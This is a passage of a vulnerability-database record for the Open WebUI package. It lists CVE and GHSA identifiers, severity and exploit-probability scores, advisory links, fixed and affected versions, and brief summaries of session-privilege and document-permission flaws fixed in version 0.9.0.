url https://api.first.org/data/v1/epss?cve=CVE-2026-45396
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45396
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45396
3
reference_url https://github.com/advisories/GHSA-rjmp-vjf2-qf4g
reference_id GHSA-rjmp-vjf2-qf4g
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-rjmp-vjf2-qf4g
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-rjmp-vjf2-qf4g
reference_id GHSA-rjmp-vjf2-qf4g
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-15T22:16:35Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-rjmp-vjf2-qf4g
fixed_packages
0
url pkg:pypi/open-webui@0.9.5
purl pkg:pypi/open-webui@0.9.5
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.5
aliases CVE-2026-45396, GHSA-rjmp-vjf2-qf4g
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-yug9-shts-kufb
67
url VCID-yysb-dk2k-f7g4
vulnerability_id VCID-yysb-dk2k-f7g4
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, administrative role changes and user deletions do not iterate SESSION_POOL to disconnect affected sessions. As a result, a user whose admin role has been revoked retains admin privileges within their existing Socket.IO session for as long as they keep the connection alive (via automatic heartbeats). The gap is exclusive to the Socket.IO session cache. This vulnerability is fixed in 0.9.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-44553
reference_id
reference_type
scores
0
value 0.00033
scoring_system epss
scoring_elements 0.10283
published_at 2026-06-12T12:55:00Z
1
value 0.00033
scoring_system epss
scoring_elements 0.10269
published_at 2026-06-14T12:55:00Z
2
value 0.00033
scoring_system epss
scoring_elements 0.10234
published_at 2026-06-11T12:55:00Z
3
value 0.00033
scoring_system epss
scoring_elements 0.10286
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-44553
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-44553
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-44553
3
reference_url https://github.com/advisories/GHSA-45m8-cpm2-3v65
reference_id GHSA-45m8-cpm2-3v65
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-45m8-cpm2-3v65
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-45m8-cpm2-3v65
reference_id GHSA-45m8-cpm2-3v65
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-19T03:55:42Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-45m8-cpm2-3v65
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-5wfg-zqcy-c7ar
6
vulnerability VCID-8nzh-cpda-dkca
7
vulnerability VCID-8y4k-pj2n-8uhm
8
vulnerability VCID-cw4k-3s8z-uqh8
9
vulnerability VCID-dz6g-jgmg-wqce
10
vulnerability VCID-dzh3-rqx4-fqhv
11
vulnerability VCID-ef1t-pxjm-j7cz
12
vulnerability VCID-hj5f-yk3y-ffdg
13
vulnerability VCID-wcz4-vwx4-tufb
14
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-44553, GHSA-45m8-cpm2-3v65
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-yysb-dk2k-f7g4
68
url VCID-ze3m-g96u-27fc
vulnerability_id VCID-ze3m-g96u-27fc
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the ydoc:document:update Socket.IO event handler checks whether the sender is a member of the document's Socket.IO room (line 678) but does not verify that the sender has write permission. Users with read-only access join the document room via ydoc:document:join, which only requires read permission (line 520). Once in the room, the user can emit ydoc:document:update events that modify the in-memory Yjs document state and are broadcast to all other collaborators in real time. This vulnerability is fixed in 0.9.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-44564
reference_id
reference_type
scores
0
value 0.00042
scoring_system epss
scoring_elements 0.13273
published_at 2026-06-12T12:55:00Z
1
value 0.00042
scoring_system epss
scoring_elements 0.13253
published_at 2026-06-14T12:55:00Z
2
value 0.00042
scoring_system epss
scoring_elements 0.13172
published_at 2026-06-11T12:55:00Z
3
value 0.00042
scoring_system epss
scoring_elements 0.13279
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-44564
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-44564
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-44564
3
reference_url https://github.com/advisories/GHSA-vrfh-rj4q-rmhr
reference_id GHSA-vrfh-rj4q-rmhr
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-vrfh-rj4q-rmhr
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-vrfh-rj4q-rmhr
reference_id GHSA-vrfh-rj4q-rmhr
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-15T21:10:30Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-vrfh-rj4q-rmhr
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-5wfg-zqcy-c7ar
6
vulnerability VCID-8nzh-cpda-dkca
7
vulnerability VCID-8y4k-pj2n-8uhm
8
vulnerability VCID-cw4k-3s8z-uqh8
9
vulnerability VCID-dz6g-jgmg-wqce
10
vulnerability VCID-dzh3-rqx4-fqhv
11
vulnerability VCID-ef1t-pxjm-j7cz
12
vulnerability VCID-hj5f-yk3y-ffdg
13
vulnerability VCID-wcz4-vwx4-tufb
14
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-44564, GHSA-vrfh-rj4q-rmhr
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ze3m-g96u-27fc
Fixing_vulnerabilities
Risk_score4.5
Resource_urlhttp://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.3.10